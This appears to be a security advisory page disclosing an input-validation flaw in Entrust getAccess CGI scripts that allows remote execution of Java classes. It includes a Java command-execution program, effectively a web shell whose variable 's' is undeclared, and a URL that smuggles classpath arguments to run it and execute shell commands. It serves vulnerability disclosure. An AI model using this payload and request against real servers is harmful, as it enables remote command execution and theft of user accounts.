Home  Services  Contact  Projects  Whitepapers  Tools 

ENTRUSTS getAccess[]


getAccess[tm] is used as a single-sign-on system often used for large internet-portals.

--- snip (http://www.entrust.com) ---

Entrust GetAccess[tm] offers the most comprehensive solution for consistently deploying and enforcing
basic and enhanced security across online applications, from Web browsers, to enterprise applications and
legacy database systems.

--- snip ---

problem description:

due to missing input-validation it is possible to run(start) java-programs on the "getaccess"-machine.
combined with public accessibly uploads or any other possibility to create class-files on the server this vulnerability could be used to run arbitrary system commands on the target machine( or change getAccess parameters and steal any user account you want BTW).

it should also be possible(but not proven yet) to exploit default-,install- or demo classes within Java or getAccess which would make the file-upload(creation) part unneeded!


Example:

find exploitable getAccess-class(one which accepts params!) or upload a "command" programm:

--- cut here (example cmd.java) ---

import java.io.*;
public class cmd {
public static void main(String args[]) {
s = null;
try {
Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]);
BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));
System.out.println("Content-type: text/html\n\n");
while ((s = stdInput.readLine()) != null) { System.out.println(s); }
while ((s = stdError.readLine()) != null) { System.out.println(s); }
System.exit(0);
}
catch (IOException e) { e.printStackTrace(); System.exit(-1); }
} }

--- cut here ---


later then .. a http-request to :

http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

.. will run "/whereever/cmd.class" and execute "/bin/ls -alsi"



Summary:

object: *.gas.bat (all the getAccess cgi-shell-scripts)
class: input validation
remote: yes


(and BTW. i would NEVER EVER recommand to use shell-scripts for authentication purposes!)


RC-EOF


Home  Services  Contact  Projects  Whitepapers  Tools